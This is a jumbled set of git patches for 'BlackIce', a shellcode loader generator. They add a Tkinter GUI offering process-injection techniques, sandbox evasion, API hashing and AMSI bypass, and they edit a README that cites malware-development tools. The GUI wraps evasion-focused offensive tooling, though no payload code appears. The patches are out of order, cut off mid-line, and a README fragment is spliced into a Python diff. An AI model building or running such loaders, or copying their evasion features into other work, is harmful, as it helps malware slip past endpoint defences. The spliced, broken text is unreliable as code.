+
Date: Thu, 11 Dec 2025 19:44:44 +0000
Subject: [PATCH 09/12] readme update
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 17407e3..67a575e 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,5 @@
-
▄▄▄▄ ██▓ ▄▄▄ ▄████▄ ██ ▄█▀ ██▓ ▄████▄ ▓█████
▓█████▄ ▓██▒ ▒████▄ ▒██▀ ▀█ ██▄█▒ ▓██▒▒██▀ ▀█ ▓█ ▀
▒██▒ ▄██▒██░ ▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒██▒▒▓█ ▄ ▒███
From a048713724995d9fc80712bc42bee3fec7a1fbec Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Wed, 22 Apr 2026 22:30:29 +0100
Subject: [PATCH 10/12] Add files via upload
gui dev testing
---
gui.py | 181 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 181 insertions(+)
create mode 100644 gui.py
diff --git a/gui.py b/gui.py
new file mode 100644
index 0000000..5c68bc9
--- /dev/null
+++ b/gui.py
@@ -0,0 +1,181 @@
+#!/usr/bin/env python3
+import tkinter as tk
+from tkinter import ttk, scrolledtext, filedialog, messagebox
+import subprocess
+import threading
+import json
+import os
+import sys
+from pathlib import Path
+import webbrowser
+
+class BlackIceGUI:
+ def __init__(self, root):
+ self.root = root
+ self.root.title("BlackIce Shellcode Loader Generator")
+ self.root.geometry("1000x750")
+
+ # Apply a dark theme
+ self.root.tk_setPalette(background='#2b2b2b', foreground='#ffffff',
+ activeBackground='#404040', activeForeground='#ffffff')
+
+ # Create notebook for tabs
+ self.notebook = ttk.Notebook(root)
+ self.notebook.pack(fill="both", expand=True, padx=10, pady=10)
+
+ # Create tabs
+ self.create_main_tab()
+ self.create_execution_tab()
+ self.create_evasion_tab()
+ self.create_encoding_tab()
+ self.create_advanced_tab()
+ self.create_output_tab()
+
+ # Status bar
+ self.status_var = tk.StringVar()
+ self.status_var.set("Ready")
+ self.status_bar = ttk.Label(root, textvariable=self.status_var, relief=tk.SUNKEN)
+ self.status_bar.pack(side=tk.BOTTOM, fill=tk.X)
+
+ # Process reference for stopping operations
+ self.blackice_process = None
+ self.blackice_thread = None
+
+ # Find BlackIce binary
+ self.find_blackice_binary()
+
+ def find_blackice_binary(self):
+ # Try to find the BlackIce binary in common locations
+ possible_paths = [
+ "./build/blackice_linux_amd64",
+ "./blackice_linux_amd64",
+ "/usr/local/bin/blackice",
+ "/usr/bin/blackice"
+ ]
+
+ self.blackice_path = None
+ for path in possible_paths:
+ if os.path.exists(path):
+ self.blackice_path = path
+ self.status_var.set(f"Found BlackIce at {path}")
+ return
+
+ # If not found, ask user to locate it
+ self.status_var.set("BlackIce binary not found. Please specify the path in the Advanced tab.")
+
+ def create_main_tab(self):
+ main_frame = ttk.Frame(self.notebook)
+ self.notebook.add(main_frame, text="Main")
+
+ # Required parameters section
+ required_frame = ttk.LabelFrame(main_frame, text="Required Parameters")
+ required_frame.pack(fill="x", padx=10, pady=10)
+
+ ttk.Label(required_frame, text="Input:").grid(row=0, column=0, padx=5, pady=5, sticky="w")
+ self.input_var = tk.StringVar()
+ self.input_entry = ttk.Entry(required_frame, textvariable=self.input_var, width=60)
+ self.input_entry.grid(row=0, column=1, padx=5, pady=5)
+
+ self.input_browse_button = ttk.Button(required_frame, text="Browse", command=self.browse_input)
+ self.input_browse_button.grid(row=0, column=2, padx=5, pady=5)
+
+ ttk.Label(required_frame, text="Output:").grid(row=1, column=0, padx=5, pady=5, sticky="w")
+ self.output_var = tk.StringVar()
+ self.output_entry = ttk.Entry(required_frame, textvariable=self.output_var, width=60)
+ self.output_entry.grid(row=1, column=1, padx=5, pady=5)
+
+ self.output_browse_button = ttk.Button(required_frame, text="Browse", command=self.browse_output)
+ self.output_browse_button.grid(row=1, column=2, padx=5, pady=5)
+
+ ttk.Label(required_frame, text="Format:").grid(row=2, column=0, padx=5, pady=5, sticky="w")
+ self.format_var = tk.StringVar(value="exe")
+ self.format_combo = ttk.Combobox(required_frame, textvariable=self.format_var, values=["exe", "dll"])
+ self.format_combo.grid(row=2, column=1, padx=5, pady=5, sticky="w")
+
+ # Architecture section
+ arch_frame = ttk.LabelFrame(main_frame, text="Architecture")
+ arch_frame.pack(fill="x", padx=10, pady=10)
+
+ self.arch_var = tk.StringVar(value="amd64")
+ ttk.Radiobutton(arch_frame, text="amd64", variable=self.arch_var, value="amd64").pack(side=tk.LEFT, padx=5)
+ ttk.Radiobutton(arch_frame, text="386", variable=self.arch_var, value="386").pack(side=tk.LEFT, padx=5)
+
+ # Quick options section
+ quick_frame = ttk.LabelFrame(main_frame, text="Quick Options")
+ quick_frame.pack(fill="x", padx=10, pady=10)
+
+ self.verbose_var = tk.BooleanVar()
+ self.verbose_check = ttk.Checkbutton(quick_frame, text="Verbose", variable=self.verbose_var)
+ self.verbose_check.grid(row=0, column=0, padx=5, pady=5, sticky="w")
+
+ self.compress_var = tk.BooleanVar()
+ self.compress_check = ttk.Checkbutton(quick_frame, text="Compress", variable=self.compress_var)
+ self.compress_check.grid(row=0, column=1, padx=5, pady=5, sticky="w")
+
+ self.calc_var = tk.BooleanVar()
+ self.calc_check = ttk.Checkbutton(quick_frame, text="Use calc.exe shellcode (no input needed)", variable=self.calc_var)
+ self.calc_check.grid(row=1, column=0, padx=5, pady=5, sticky="w")
+
+ self.rand_var = tk.BooleanVar()
+ self.rand_check = ttk.Checkbutton(quick_frame, text="Random parameters (for testing)", variable=self.rand_var)
+ self.rand_check.grid(row=1, column=1, padx=5, pady=5, sticky="w")
+
+ # Generate button
+ button_frame = ttk.Frame(main_frame)
+ button_frame.pack(fill="x", padx=10, pady=10)
+
+ self.generate_button = ttk.Button(button_frame, text="Generate Loader", command=self.generate_loader)
+ self.generate_button.pack(side=tk.LEFT, padx=5)
+
+ self.stop_button = ttk.Button(button_frame, text="Stop", state=tk.DISABLED, command=self.stop_generation)
+ self.stop_button.pack(side=tk.LEFT, padx=5)
+
+ # Output section
+ output_frame = ttk.LabelFrame(main_frame, text="Output")
+ output_frame.pack(fill="both", expand=True, padx=10, pady=10)
+
+ self.output_text = scrolledtext.ScrolledText(output_frame, height=15)
+ self.output_text.pack(fill="both", expand=True, padx=5, pady=5)
+
+ def create_execution_tab(self):
+ exec_frame = ttk.Frame(self.notebook)
+ self.notebook.add(exec_frame, text="Execution")
+
+ # Execution technique section
+ technique_frame = ttk.LabelFrame(exec_frame, text="Execution Technique")
+ technique_frame.pack(fill="x", padx=10, pady=10)
+
+ ttk.Label(technique_frame, text="Technique:").grid(row=0, column=0, padx=5, pady=5, sticky="w")
+ self.exec_var = tk.StringVar(value="SuspendedProcess")
+ self.exec_combo = ttk.Combobox(technique_frame, textvariable=self.exec_var,
+ values=["SuspendedProcess", "ProcessHollowing", "NtCreateThreadEx",
+ "EtwpCreateEtwThread", "NtQueueApcThreadEx", "No-RWX"])
+ self.exec_combo.grid(row=0, column=1, padx=5, pady=5, sticky="w")
+
+ ttk.Label(technique_frame, text="Process:").grid(row=1, column=0, padx=5, pady=5, sticky="w")
+ self.proc_var = tk.StringVar(value="notepad.exe")
+ self.proc_entry = ttk.Entry(technique_frame, textvariable=self.proc_var, width=30)
+ self.proc_entry.grid(row=1, column=1, padx=5, pady=5, sticky="w")
+
+ # Sleep option
+ sleep_frame = ttk.LabelFrame(exec_frame, text="Sleep")
+ sleep_frame.pack(fill="x", padx=10, pady=10)
+
+ self.sleep_var = tk.BooleanVar()
+ self.sleep_check = ttk.Checkbutton(sleep_frame, text="Delay shellcode execution", variable=self.sleep_var)
+ self.sleep_check.pack(anchor="w", padx=5, pady=5)
+
+ def create_evasion_tab(self):
+ evasion_frame = ttk.Frame(self.notebook)
+ self.notebook.add(evasion_frame, text="Evasion")
+
+ # Evasion options section
+ evasion_options_frame = ttk.LabelFrame(evasion_frame, text="Evasion Options")
+ evasion_options_frame.pack(fill="x", padx=10, pady=10)
+
+ self.sandbox_var = tk.BooleanVar()
+ self.sandbox_check = ttk.Checkbutton(evasion_options_frame, text="Enable sandbox evasion", variable=self.sandbox_var)
+ self.sandbox_check.grid(row=0, column=0, padx=5, pady=5, sticky="w")
+
+ self.hashing_var = tk.BooleanVar()
+ self.hashing_check = ttk.Checkbutton(evasion_options
\ No newline at end of file
From d04076c5a7997ea4ca07cbff6f296e750c5cc47a Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Wed, 22 Apr 2026 22:56:38 +0100
Subject: [PATCH 11/12] Update gui.py
attempt error fix
---
gui.py | 80 ++++++++++++++++++++++++++++++++++++++++------------------
1 file changed, 56 insertions(+), 24 deletions(-)
diff --git a/gui.py b/gui.py
index 5c68bc9..fc642cf 100644
--- a/gui.py
+++ b/gui.py
@@ -8,6 +8,7 @@
import sys
from pathlib import Path
import webbrowser
+import platform
class BlackIceGUI:
def __init__(self, root):
@@ -45,19 +46,33 @@ def __init__(self, root):
self.find_blackice_binary()
def find_blackice_binary(self):
- # Try to find the BlackIce binary in common locations
- possible_paths = [
- "./build/blackice_linux_amd64",
- "./blackice_linux_amd64",
- "/usr/local/bin/blackice",
- "/usr/bin/blackice"
- ]
+ # Try to find the BlackIce binary in common locations based on platform
+ system = platform.system()
+ possible_paths = []
+
+ if system == "Windows":
+ possible_paths = [
+ ".\\blackice_windows_amd64.exe",
+ ".\\build\\blackice_windows_amd64.exe",
+ ".\\blackice.exe",
+ "C:\\Program Files\\BlackIce\\blackice.exe",
+ "C:\\Users\\%USERNAME%\\AppData\\Local\\BlackIce\\blackice.exe"
+ ]
+ else: # Linux and others
+ possible_paths = [
+ "./build/blackice_linux_amd64",
+ "./blackice_linux_amd64",
+ "/usr/local/bin/blackice",
+ "/usr/bin/blackice"
+ ]
self.blackice_path = None
for path in possible_paths:
- if os.path.exists(path):
- self.blackice_path = path
- self.status_var.set(f"Found BlackIce at {path}")
+ # Expand environment variables like %USERNAME%
+ expanded_path = os.path.expandvars(path)
+ if os.path.exists(expanded_path):
+ self.blackice_path = expanded_path
+ self.status_var.set(f"Found BlackIce at {expanded_path}")
return
# If not found, ask user to locate it
@@ -165,17 +180,34 @@ def create_execution_tab(self):
self.sleep_check = ttk.Checkbutton(sleep_frame, text="Delay shellcode execution", variable=self.sleep_var)
self.sleep_check.pack(anchor="w", padx=5, pady=5)
- def create_evasion_tab(self):
- evasion_frame = ttk.Frame(self.notebook)
- self.notebook.add(evasion_frame, text="Evasion")
-
- # Evasion options section
- evasion_options_frame = ttk.LabelFrame(evasion_frame, text="Evasion Options")
- evasion_options_frame.pack(fill="x", padx=10, pady=10)
-
- self.sandbox_var = tk.BooleanVar()
- self.sandbox_check = ttk.Checkbutton(evasion_options_frame, text="Enable sandbox evasion", variable=self.sandbox_var)
- self.sandbox_check.grid(row=0, column=0, padx=5, pady=5, sticky="w")
-
- self.hashing_var = tk.BooleanVar()
- self.hashing_check = ttk.Checkbutton(evasion_options
\ No newline at end of file
+ def create_evasion_tab(self):
+ evasion_frame = ttk.Frame(self.notebook)
+ self.notebook.add(evasion_frame, text="Evasion")
+
+ # Evasion options section
+ evasion_options_frame = ttk.LabelFrame(evasion_frame, text="Evasion Options")
+ evasion_options_frame.pack(fill="x", padx=10, pady=10)
+
+ self.sandbox_var = tk.BooleanVar()
+ self.sandbox_check = ttk.Checkbutton(evasion_options_frame, text="Enable sandbox evasion", variable=self.sandbox_var)
+ self.sandbox_check.grid(row=0, column=0, padx=5, pady=5, sticky="w")
+
+ self.hashing_var = tk.BooleanVar()
+ self.hashing_check = ttk.Checkbutton(evasion_options_frame, text="Use API hashing", variable=self.hashing_var)
+ self.hashing_check.grid(row=1, column=0, padx=5, pady=5, sticky="w")
+
+ self.cleanup_var = tk.BooleanVar()
+ self.cleanup_check = ttk.Checkbutton(evasion_options_frame, text="Enable cleanup", variable=self.cleanup_var)
+ self.cleanup_check.grid(row=2, column=0, padx=5, pady=5, sticky="w")
+
+ # AMSI bypass section
+ amsi_frame = ttk.LabelFrame(evasion_frame, text="AMSI Bypass")
+ amsi_frame.pack(fill="x", padx=10, pady=10)
+
+ self.amsi_var = tk.BooleanVar()
+ self.amsi_check = ttk.Checkbutton(amsi_frame, text="Enable AMSI bypass", variable=self.amsi_var)
+ self.amsi_check.pack(anchor="w", padx=5, pady=5)
+
+ self.amsi_hook_var = tk.StringVar(value="Unhook")
+ ttk.Radiobutton(amsi_frame, text="Unhook", variable=self.amsi_hook_var, value="Unhook").pack(anchor="w", padx=20)
+ ttk.Radiobutton(amsi_frame, text="Patch", variable=self.amsi_hook_var, value="Patch").pack(anchor="w", padx=20)
From 2c2704cf087a3c8184792b8059e8fce4d41a27d4 Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Wed, 22 Apr 2026 23:05:16 +0100
Subject: [PATCH 12/12] Update gui.py
code reformat
---
gui.py | 320 ++++++++++++++++++++++++++-------------------------------
1 file changed, 147 insertions(+), 173 deletions(-)
diff --git a/gui.py b/gui.py
index fc642cf..332b25e 100644
--- a/gui.py
+++ b/gui.py
@@ -3,211 +3,185 @@
from tkinter import ttk, scrolledtext, filedialog, messagebox
import subprocess
import threading
-import json
import os
-import sys
-from pathlib import Path
-import webbrowser
import platform
+import shlex
class BlackIceGUI:
def __init__(self, root):
self.root = root
self.root.title("BlackIce Shellcode Loader Generator")
- self.root.geometry("1000x750")
+ self.root.geometry("1000x800")
- # Apply a dark theme
+ # Apply a dark theme (Manual colors for standard Tkinter widgets)
self.root.tk_setPalette(background='#2b2b2b', foreground='#ffffff',
activeBackground='#404040', activeForeground='#ffffff')
- # Create notebook for tabs
+ # Style configuration for ttk widgets
+ style = ttk.Style()
+ style.theme_use('clam')
+ style.configure("TNotebook", background="#2b2b2b", borderwidth=0)
+ style.configure("TFrame", background="#2b2b2b")
+ style.configure("TLabelframe", background="#2b2b2b", foreground="white")
+ style.configure("TLabelframe.Label", background="#2b2b2b", foreground="white")
+
self.notebook = ttk.Notebook(root)
self.notebook.pack(fill="both", expand=True, padx=10, pady=10)
- # Create tabs
+ # Initialize variables
+ self.blackice_path = tk.StringVar()
+ self.input_var = tk.StringVar()
+ self.output_var = tk.StringVar()
+ self.format_var = tk.StringVar(value="exe")
+ self.arch_var = tk.StringVar(value="amd64")
+ self.exec_var = tk.StringVar(value="SuspendedProcess")
+ self.proc_var = tk.StringVar(value="notepad.exe")
+
+ # Booleans
+ self.verbose_var = tk.BooleanVar()
+ self.compress_var = tk.BooleanVar()
+ self.calc_var = tk.BooleanVar()
+ self.sandbox_var = tk.BooleanVar()
+ self.hashing_var = tk.BooleanVar()
+ self.amsi_var = tk.BooleanVar()
+
+ # Build Tabs
self.create_main_tab()
self.create_execution_tab()
self.create_evasion_tab()
- self.create_encoding_tab()
self.create_advanced_tab()
- self.create_output_tab()
# Status bar
- self.status_var = tk.StringVar()
- self.status_var.set("Ready")
+ self.status_var = tk.StringVar(value="Ready")
self.status_bar = ttk.Label(root, textvariable=self.status_var, relief=tk.SUNKEN)
self.status_bar.pack(side=tk.BOTTOM, fill=tk.X)
- # Process reference for stopping operations
self.blackice_process = None
- self.blackice_thread = None
-
- # Find BlackIce binary
self.find_blackice_binary()
-
+
def find_blackice_binary(self):
- # Try to find the BlackIce binary in common locations based on platform
- system = platform.system()
- possible_paths = []
-
- if system == "Windows":
- possible_paths = [
- ".\\blackice_windows_amd64.exe",
- ".\\build\\blackice_windows_amd64.exe",
- ".\\blackice.exe",
- "C:\\Program Files\\BlackIce\\blackice.exe",
- "C:\\Users\\%USERNAME%\\AppData\\Local\\BlackIce\\blackice.exe"
- ]
- else: # Linux and others
- possible_paths = [
- "./build/blackice_linux_amd64",
- "./blackice_linux_amd64",
- "/usr/local/bin/blackice",
- "/usr/bin/blackice"
- ]
-
- self.blackice_path = None
- for path in possible_paths:
- # Expand environment variables like %USERNAME%
- expanded_path = os.path.expandvars(path)
- if os.path.exists(expanded_path):
- self.blackice_path = expanded_path
- self.status_var.set(f"Found BlackIce at {expanded_path}")
+ """Auto-locate the BlackIce binary based on OS."""
+ name = "blackice.exe" if platform.system() == "Windows" else "blackice"
+ possible = [f"./{name}", f"./build/{name}", f"/usr/local/bin/{name}"]
+ for p in possible:
+ if os.path.exists(p):
+ self.blackice_path.set(os.path.abspath(p))
+ self.status_var.set(f"Found binary: {p}")
return
-
- # If not found, ask user to locate it
- self.status_var.set("BlackIce binary not found. Please specify the path in the Advanced tab.")
-
+ self.status_var.set("Binary not found. Please set path in 'Advanced' tab.")
+
+ def browse_input(self):
+ path = filedialog.askopenfilename(title="Select Shellcode Binary (.bin)")
+ if path: self.input_var.set(path)
+
+ def browse_output(self):
+ path = filedialog.asksaveasfilename(title="Save Loader As")
+ if path: self.output_var.set(path)
+
def create_main_tab(self):
- main_frame = ttk.Frame(self.notebook)
- self.notebook.add(main_frame, text="Main")
-
- # Required parameters section
- required_frame = ttk.LabelFrame(main_frame, text="Required Parameters")
- required_frame.pack(fill="x", padx=10, pady=10)
-
- ttk.Label(required_frame, text="Input:").grid(row=0, column=0, padx=5, pady=5, sticky="w")
- self.input_var = tk.StringVar()
- self.input_entry = ttk.Entry(required_frame, textvariable=self.input_var, width=60)
- self.input_entry.grid(row=0, column=1, padx=5, pady=5)
-
- self.input_browse_button = ttk.Button(required_frame, text="Browse", command=self.browse_input)
- self.input_browse_button.grid(row=0, column=2, padx=5, pady=5)
-
- ttk.Label(required_frame, text="Output:").grid(row=1, column=0, padx=5, pady=5, sticky="w")
- self.output_var = tk.StringVar()
- self.output_entry = ttk.Entry(required_frame, textvariable=self.output_var, width=60)
- self.output_entry.grid(row=1, column=1, padx=5, pady=5)
-
- self.output_browse_button = ttk.Button(required_frame, text="Browse", command=self.browse_output)
- self.output_browse_button.grid(row=1, column=2, padx=5, pady=5)
-
- ttk.Label(required_frame, text="Format:").grid(row=2, column=0, padx=5, pady=5, sticky="w")
- self.format_var = tk.StringVar(value="exe")
- self.format_combo = ttk.Combobox(required_frame, textvariable=self.format_var, values=["exe", "dll"])
- self.format_combo.grid(row=2, column=1, padx=5, pady=5, sticky="w")
-
- # Architecture section
- arch_frame = ttk.LabelFrame(main_frame, text="Architecture")
- arch_frame.pack(fill="x", padx=10, pady=10)
-
- self.arch_var = tk.StringVar(value="amd64")
- ttk.Radiobutton(arch_frame, text="amd64", variable=self.arch_var, value="amd64").pack(side=tk.LEFT, padx=5)
- ttk.Radiobutton(arch_frame, text="386", variable=self.arch_var, value="386").pack(side=tk.LEFT, padx=5)
-
- # Quick options section
- quick_frame = ttk.LabelFrame(main_frame, text="Quick Options")
- quick_frame.pack(fill="x", padx=10, pady=10)
-
- self.verbose_var = tk.BooleanVar()
- self.verbose_check = ttk.Checkbutton(quick_frame, text="Verbose", variable=self.verbose_var)
- self.verbose_check.grid(row=0, column=0, padx=5, pady=5, sticky="w")
-
- self.compress_var = tk.BooleanVar()
- self.compress_check = ttk.Checkbutton(quick_frame, text="Compress", variable=self.compress_var)
- self.compress_check.grid(row=0, column=1, padx=5, pady=5, sticky="w")
-
- self.calc_var = tk.BooleanVar()
- self.calc_check = ttk.Checkbutton(quick_frame, text="Use calc.exe shellcode (no input needed)", variable=self.calc_var)
- self.calc_check.grid(row=1, column=0, padx=5, pady=5, sticky="w")
-
- self.rand_var = tk.BooleanVar()
- self.rand_check = ttk.Checkbutton(quick_frame, text="Random parameters (for testing)", variable=self.rand_var)
- self.rand_check.grid(row=1, column=1, padx=5, pady=5, sticky="w")
-
- # Generate button
- button_frame = ttk.Frame(main_frame)
- button_frame.pack(fill="x", padx=10, pady=10)
+ tab = ttk.Frame(self.notebook)
+ self.notebook.add(tab, text="Main")
- self.generate_button = ttk.Button(button_frame, text="Generate Loader", command=self.generate_loader)
- self.generate_button.pack(side=tk.LEFT, padx=5)
+ # Files
+ req = ttk.LabelFrame(tab, text="Required Parameters")
+ req.pack(fill="x", padx=10, pady=10)
- self.stop_button = ttk.Button(button_frame, text="Stop", state=tk.DISABLED, command=self.stop_generation)
- self.stop_button.pack(side=tk.LEFT, padx=5)
+ ttk.Label(req, text="Input:").grid(row=0, column=0, padx=5, pady=5)
+ ttk.Entry(req, textvariable=self.input_var, width=50).grid(row=0, column=1)
+ ttk.Button(req, text="Browse", command=self.browse_input).grid(row=0, column=2)
- # Output section
- output_frame = ttk.LabelFrame(main_frame, text="Output")
- output_frame.pack(fill="both", expand=True, padx=10, pady=10)
-
- self.output_text = scrolledtext.ScrolledText(output_frame, height=15)
- self.output_text.pack(fill="both", expand=True, padx=5, pady=5)
-
+ ttk.Label(req, text="Output:").grid(row=1, column=0, padx=5, pady=5)
+ ttk.Entry(req, textvariable=self.output_var, width=50).grid(row=1, column=1)
+ ttk.Button(req, text="Browse", command=self.browse_output).grid(row=1, column=2)
+
+ # Options
+ opt = ttk.Frame(tab)
+ opt.pack(fill="x", padx=10)
+ ttk.Label(opt, text="Format:").pack(side=tk.LEFT, padx=5)
+ ttk.Combobox(opt, textvariable=self.format_var, values=["exe", "dll"], width=10).pack(side=tk.LEFT)
+
+ ttk.Label(opt, text="Arch:").pack(side=tk.LEFT, padx=20)
+ ttk.Radiobutton(opt, text="x64", variable=self.arch_var, value="amd64").pack(side=tk.LEFT)
+ ttk.Radiobutton(opt, text="x86", variable=self.arch_var, value="386").pack(side=tk.LEFT)
+
+ # Output Console
+ self.output_text = scrolledtext.ScrolledText(tab, height=15, bg="#1e1e1e", fg="#00ff00")
+ self.output_text.pack(fill="both", expand=True, padx=10, pady=10)
+
+ btn_frame = ttk.Frame(tab)
+ btn_frame.pack(fill="x")
+ self.gen_btn = ttk.Button(btn_frame, text="GENERATE LOADER", command=self.start_generation)
+ self.gen_btn.pack(side=tk.RIGHT, padx=10, pady=5)
+
def create_execution_tab(self):
- exec_frame = ttk.Frame(self.notebook)
- self.notebook.add(exec_frame, text="Execution")
+ tab = ttk.Frame(self.notebook)
+ self.notebook.add(tab, text="Execution")
- # Execution technique section
- technique_frame = ttk.LabelFrame(exec_frame, text="Execution Technique")
- technique_frame.pack(fill="x", padx=10, pady=10)
+ ttk.Label(tab, text="Injection Technique:").pack(anchor="w", padx=10, pady=5)
+ techniques = ["SuspendedProcess", "ProcessHollowing", "NtCreateThreadEx", "NtQueueApcThreadEx"]
+ ttk.Combobox(tab, textvariable=self.exec_var, values=techniques).pack(fill="x", padx=10)
- ttk.Label(technique_frame, text="Technique:").grid(row=0, column=0, padx=5, pady=5, sticky="w")
- self.exec_var = tk.StringVar(value="SuspendedProcess")
- self.exec_combo = ttk.Combobox(technique_frame, textvariable=self.exec_var,
- values=["SuspendedProcess", "ProcessHollowing", "NtCreateThreadEx",
- "EtwpCreateEtwThread", "NtQueueApcThreadEx", "No-RWX"])
- self.exec_combo.grid(row=0, column=1, padx=5, pady=5, sticky="w")
+ ttk.Label(tab, text="Target Process:").pack(anchor="w", padx=10, pady=5)
+ ttk.Entry(tab, textvariable=self.proc_var).pack(fill="x", padx=10)
+
+ def create_evasion_tab(self):
+ tab = ttk.Frame(self.notebook)
+ self.notebook.add(tab, text="Evasion")
- ttk.Label(technique_frame, text="Process:").grid(row=1, column=0, padx=5, pady=5, sticky="w")
- self.proc_var = tk.StringVar(value="notepad.exe")
- self.proc_entry = ttk.Entry(technique_frame, textvariable=self.proc_var, width=30)
- self.proc_entry.grid(row=1, column=1, padx=5, pady=5, sticky="w")
-
- # Sleep option
- sleep_frame = ttk.LabelFrame(exec_frame, text="Sleep")
- sleep_frame.pack(fill="x", padx=10, pady=10)
-
- self.sleep_var = tk.BooleanVar()
- self.sleep_check = ttk.Checkbutton(sleep_frame, text="Delay shellcode execution", variable=self.sleep_var)
- self.sleep_check.pack(anchor="w", padx=5, pady=5)
-
- def create_evasion_tab(self):
- evasion_frame = ttk.Frame(self.notebook)
- self.notebook.add(evasion_frame, text="Evasion")
-
- # Evasion options section
- evasion_options_frame = ttk.LabelFrame(evasion_frame, text="Evasion Options")
- evasion_options_frame.pack(fill="x", padx=10, pady=10)
-
- self.sandbox_var = tk.BooleanVar()
- self.sandbox_check = ttk.Checkbutton(evasion_options_frame, text="Enable sandbox evasion", variable=self.sandbox_var)
- self.sandbox_check.grid(row=0, column=0, padx=5, pady=5, sticky="w")
-
- self.hashing_var = tk.BooleanVar()
- self.hashing_check = ttk.Checkbutton(evasion_options_frame, text="Use API hashing", variable=self.hashing_var)
- self.hashing_check.grid(row=1, column=0, padx=5, pady=5, sticky="w")
-
- self.cleanup_var = tk.BooleanVar()
- self.cleanup_check = ttk.Checkbutton(evasion_options_frame, text="Enable cleanup", variable=self.cleanup_var)
- self.cleanup_check.grid(row=2, column=0, padx=5, pady=5, sticky="w")
-
- # AMSI bypass section
- amsi_frame = ttk.LabelFrame(evasion_frame, text="AMSI Bypass")
- amsi_frame.pack(fill="x", padx=10, pady=10)
-
- self.amsi_var = tk.BooleanVar()
- self.amsi_check = ttk.Checkbutton(amsi_frame, text="Enable AMSI bypass", variable=self.amsi_var)
- self.amsi_check.pack(anchor="w", padx=5, pady=5)
-
- self.amsi_hook_var = tk.StringVar(value="Unhook")
- ttk.Radiobutton(amsi_frame, text="Unhook", variable=self.amsi_hook_var, value="Unhook").pack(anchor="w", padx=20)
- ttk.Radiobutton(amsi_frame, text="Patch", variable=self.amsi_hook_var, value="Patch").pack(anchor="w", padx=20)
+ ttk.Checkbutton(tab, text="Sandbox Evasion", variable=self.sandbox_var).pack(anchor="w", padx=20, pady=5)
+ ttk.Checkbutton(tab, text="API Hashing", variable=self.hashing_var).pack(anchor="w", padx=20, pady=5)
+ ttk.Checkbutton(tab, text="AMSI Bypass", variable=self.amsi_var).pack(anchor="w", padx=20, pady=5)
+
+ def create_advanced_tab(self):
+ tab = ttk.Frame(self.notebook)
+ self.notebook.add(tab, text="Advanced")
+ ttk.Label(tab, text="BlackIce Binary Path:").pack(anchor="w", padx=10, pady=5)
+ ttk.Entry(tab, textvariable=self.blackice_path).pack(fill="x", padx=10)
+
+ def log(self, message):
+ self.output_text.insert(tk.END, message + "\n")
+ self.output_text.see(tk.END)
+
+ def start_generation(self):
+ # Build command list
+ if not self.blackice_path.get():
+ messagebox.showerror("Error", "BlackIce binary path is not set!")
+ return
+
+ cmd = [self.blackice_path.get(), "-f", self.format_var.get(), "-a", self.arch_var.get()]
+
+ if self.calc_var.get():
+ cmd.append("-calc")
+ else:
+ if not self.input_var.get():
+ messagebox.showerror("Error", "Please select an input file or check 'Use calc'")
+ return
+ cmd.extend(["-i", self.input_var.get()])
+
+ if self.output_var.get():
+ cmd.extend(["-o", self.output_var.get()])
+
+ # Add flags based on repository CLI args
+ if self.sandbox_var.get(): cmd.append("-sandbox")
+ if self.amsi_var.get(): cmd.append("-amsi")
+
+ self.log(f"[*] Running: {' '.join(cmd)}")
+ threading.Thread(target=self.run_process, args=(cmd,), daemon=True).start()
+
+ def run_process(self, cmd):
+ try:
+ self.gen_btn.config(state=tk.DISABLED)
+ process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True)
+ for line in process.stdout:
+ self.log(line.strip())
+ process.wait()
+ self.log("[+] Finished.")
+ except Exception as e:
+ self.log(f"[!] Error: {str(e)}")
+ finally:
+ self.gen_btn.config(state=tk.NORMAL)
+
+if __name__ == "__main__":
+ root = tk.Tk()
+ app = BlackIceGUI(root)
+ root.mainloop()
-
- 
-
-
-
- 
-
-
-# TODO
-
-- ~~Check username and hostname before running~~
-- Add direct and indirect syscall
-- Add Chacha20 cypher to encrypt shellcode
-
# Library
The official Golang package has most of the already mentioned features and some others. To make use of it, see [here](https://github.com/D3Ext/Hooka/tree/main/examples) and [here](https://github.com/D3Ext/Hooka/tree/main/pkg/hooka)
@@ -213,7 +199,5 @@ Use this project under your own responsability! The author is not responsible of
This project is under [MIT](https://github.com/D3Ext/Hooka/blob/main/LICENSE) license
-Copyright © 2025, *D3Ext*
-
From 746e97eca40ad8a7f7f413a55891b7003d6e5a90 Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Thu, 11 Dec 2025 19:11:52 +0000
Subject: [PATCH 03/12] updated readme
---
README.md | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/README.md b/README.md
index c94c7be..3598b9d 100644
--- a/README.md
+++ b/README.md
@@ -22,8 +22,7 @@
# Introduction
-BlackIce is able to generate shellcode loaders with multiple capabilities. It is also based on other tools like [BokuLoader](https://github.com/boku7/BokuLoader), [Freeze](https://github.com/optiv/Freeze) or [Shhhloader](https://github.com/icyguider/Shhhloader), and it tries to implement more evasion features. Why in Golang? Although it's not the perfect language for malware dev, it works perfectly for testing purposes. Obviously if you want something professional and foolproof you should create your own loader in C++, C# or similars.
-
+BlackIce is able to generate shellcode loaders with multiple capabilities. It is also based on Hooka (see [here](https://github.com/D3Ext/Hooka)). This tool is intended for my own learning, please no not use the tool for malicious activity.
# Features
This tool is able to generate loaders with this features:
From 6cd3cf09532e010cb08a4cd68c821ca90b9e5b75 Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Thu, 11 Dec 2025 19:26:43 +0000
Subject: [PATCH 04/12] banner alt
---
cmd/main.go | 29 +++++++++++++++++++++--------
1 file changed, 21 insertions(+), 8 deletions(-)
diff --git a/cmd/main.go b/cmd/main.go
index d7a33d1..7042425 100644
--- a/cmd/main.go
+++ b/cmd/main.go
@@ -32,18 +32,31 @@ type LoaderTemplate struct {
}
// function to print the banner
-func banner(){
